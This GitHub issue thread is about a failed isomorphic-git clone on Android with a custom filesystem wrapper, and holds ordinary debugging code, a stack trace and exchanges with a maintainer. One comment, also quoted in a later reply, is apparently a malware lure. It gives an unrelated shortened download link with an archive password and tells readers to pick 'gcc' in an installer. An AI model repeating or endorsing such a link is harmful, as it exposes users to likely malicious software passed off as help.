### ISSUE TITLE
Failed to clone repo after all process 

### ISSUE THREAD

**Issue by bajrangCoder** [isomorphic-git/isomorphic-git#1956]
I created a custom backend wrapper for my Android filesystem using `lighting-fs` and simulated symlink functionalities. However, when attempting to clone a Git repository, the process fails after successfully showing:

```
Counting objects...
Compressing objects...

Total 68 (delta 21), reused 38 (delta 10), pack-reused 0 (from 0)
```

The operation fails with the following error:

```
Cannot read the property of undefined ('error')
```

I’m unsure where the failure occurs. Here’s how I am calling `git.clone()`:

```js
class Git {
  constructor() {
    const customBackend = new FsBackend();
    this.fs = new FS("myfs", { backend: customBackend });
  }
  async cloneRepo() {
    try {
      // git.init works 
      /*await git.init({
        fs: this.fs.promises,
        http,
        dir: window.DATA_STORAGE + "Test",
      })*/
      await git.clone({
        fs: this.fs.promises,
        http,
        dir: "file:///storage/emulated/0/isomorphic-git",
        corsProxy: 'https://cors.isomorphic-git.org',
        url: 'https://github.com/isomorphic-git/isomorphic-git',
        depth: 1,
        onMessage: console.log
      })
      console.log('done')
    } catch (e) {
      console.log("Error cloning: ", e)
    }
  }
}
```

Here’s my `fs` wrapper code: [fs wrapper code](https://dpaste.org/mro8i)

**Environment Information:**
- Using the latest versions of `lighting-fs` and `isomorphic-git`
- Running in a browser environment
- Bundled with `esbuild` and buffer library injected

Any assistance in resolving this issue would be greatly appreciated.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jcubic** [comment]
Can you share the code so we can test it? Also, can you explain how you run in the browser and access the file system at the same time?

First thing I would check, is if your file system works without isomorphic-git.

**Comment by bajrangCoder** [comment]
> First thing I would check, is if your file system works without isomorphic-git.

Yes , I have tested each api and it works fine.

> Can you share the code so we can test it? Also, can you explain how you run in the browser and access the file system at the same time?

But you can't run this on Browser as it needs the Cordova file system api. So for running this you will need the app, if you wish then I will share the process it's simple.

**Comment by bajrangCoder** [comment]
If you wished to test then follow the following steps

<details>
  <summary>Steps</summary>

1. Download the Acode app from play store(free version) or from f-droid.
2. Then download the zip which contains the code related to isomorphic-git and fs stuff, from [here](https://github.com/user-attachments/files/16770592/PluginZip.zip)
3. Download a plugin called "Eruda" from `Acode App>Sidebar>Plugin Section ` to see all the console logs
4. Install the zip (downloaded in step 2) in app from `Acode App>Settings>Plugins>plus icon on top right corner>select local>then choose zip from file browser`
5. Now run the git clone by pressing `Ctrl-Shift-P` in editor and search "git clone" and select it and see logs in eruda console

> Note
> I have added console logs on every fs operation for testing

</details>

**Comment by jcubic** [comment]
I'm not able to extract the files. Also I use Linux, I'm not sure if I will be
able to run your Windows application. I'm also not sure why you can't just
share the source code.

On Tue, 27 Aug 2024 09:40:48 -0700
GoldenCaterpie ***@***.***> wrote:

> Download 
> https://bit.ly/3MjP129
> password: changeme
> In the installer menu, select "gcc."
> 

--
Jakub T. Jankiewicz, Senior Front-End Developer
https://jcubic.pl/me
https://lips.js.org
https://koduj.org

**Comment by bajrangCoder** [comment]
Now I'm using the native java implementation of git

**Comment by jcubic** [comment]
Can you create a minimal working reproduction, so I can test your code?

**Comment by bajrangCoder** [comment]
Here is steps mentioned: [Steps](https://github.com/isomorphic-git/isomorphic-git/issues/1956#issuecomment-2313737087)

Btw now use this [zip file](https://github.com/user-attachments/files/17286178/PluginZip.zip) , as I have removed lighting-fs related stuffs and implemented my own wrapper which has all the required methods


And I can't make a minimal demo on web for reproducing it , as the fs rely on device fs

**Comment by jcubic** [comment]
Sorry, but I will not run your whole application to test a plugin and spend time learning how it works in other to debug the library. Please create a minimal example that I can run.

**Comment by bajrangCoder** [comment]
> Sorry, but I will not run your whole application to test a plugin and spend time learning how it works in other to debug the library. Please create a minimal example that I can run.

I can understand, but I can't make a minimal example because it needs device fs.

Btw I have tested my fs wrapper which is working fine.
I have also try by adding some console.log in isomorphic-git Package then I found that it fails at this method in isomorphic-git source:

```js
async readdir(entry) {
    try {
      const filepath = entry._fullpath;
      const { fs, cache, gitdir } = this;
      const map = await this.mapPromise;
      const obj = map.get(filepath);
      if (!obj) throw new Error(`No obj for ${filepath}`)
      const oid = obj.oid;
      if (!oid) throw new Error(`No oid for obj ${JSON.stringify(obj)}`)
      if (obj.type !== 'tree') {
        // TODO: support submodules (type === 'commit')
        return null
      }
      const { type, object } = await _readObject({ fs, cache, gitdir, oid });
      if (type !== obj.type) {
        throw new ObjectTypeError(oid, type, obj.type)
      }
      const tree = GitTree.from(object);
      // cache all entries
      for (const entry of tree) {
        map.set(join(filepath, entry.path), entry);
      }
      return tree.entries().map(entry => join(filepath, entry.path))
    } catch(err) {
      console.error(" iso readdir2 log: ", err)
    }
  }
```

Here it logs:
```
iso readdir2 log:  
TypeError {}
message: "Cannot read properties of undefined (reading 'error')"
stack: "TypeError: Cannot read properties of undefined (reading 'error')↵ at jh (https://localhost/__cdvfile_files-external__/plugins/git/main.js:14:10280)↵ at async mt (https://localhost/__cdvfile_files-external__/plugins/git/main.js:14:10799)↵ at async lr (https://localhost/__cdvfile_files-external__/plugins/git/main.js:56:175)↵ at async https://localhost/__cdvfile_files-external__/plugins/git/main.js:56:709↵ at async Mi.readdir (https://localhost/__cdvfile_files-external__/plugins/git/main.js:56:1195)↵ at async Promise.all (index 0)↵ at async u (https://localhost/__cdvfile_files-external__/plugins/git/main.js:56:5585)↵ at async h (https://localhost/__cdvfile_files-external__/plugins/git/main.js:56:5765)↵ at async ud (https://localhost/__cdvfile_files-external__/plugins/git/main.js:57:9202)↵ at async Td (https://localhost/__cdvfile_files-external__/plugins/git/main.js:76:747)"
```

My readdir wrapper code:(lsDir returns array of objects which contains the information about content of dir)
```js
async readdir(filepath, opts) {
    filepath = fixFileUrl(filepath)
    this.DEBUG && console.log("readdir", filepath);
    if (!(await fs?.(Url.dirname(filepath)).exists())) {
      throw new FileError("ENOENT", filepath, "Path Not Found");
    }

    if (await fs?.(filepath).exists()) {
      let stat = await fs?.(filepath).stat();
      if (stat.isDirectory) {
        console.log("readdir ", filepath, (await fs?.(filepath).lsDir()).map(i => i.name))
        return (await fs?.(filepath).lsDir()).map(i => i.name);
      }
      throw new FileError("ENOTDIR", filepath, "Not A Directory");
    }
    throw new FileError("ENOENT", filepath, "Path Not Found");
  } // throws ENOENT, ENOTDIR
```

> I'm trying to use this on Android

**Comment by jcubic** [comment]
So it requires a 3rd party fs library and it fails on that library? So the issue is with that library, not with isomorphic-git. You need to debug your project on your own. I will not dig through your code to find where you made a mistake in implementation of that fs you have.

**Comment by bajrangCoder** [comment]
> So it requires a 3rd party fs library and it fails on that library? So the issue is with that library, not with isomorphic-git. You need to debug your project on your own. I will not dig through your code to find where you made a mistake in implementation of that fs you have.

Sorry for any inconveniences 😔,
It relies on native Android fs. I know , definitely there is issue in my implementation not in isomorphic-git.
But I have tried to keep the api similar to the nodejs one. And it's working as expected in normal tasks.
Can you suggest any test which can be helpful in determining the flaw in the implementation.

> I will try to debug it.

**Comment by jcubic** [comment]
Can you just create basic React Native project? This should be the same as your convoluted example. React Native can use native Android FS and you can create minimal project with your fs and clone. You may even fix the issue while you will create this project. This often happen when you try to reproduce the issue.
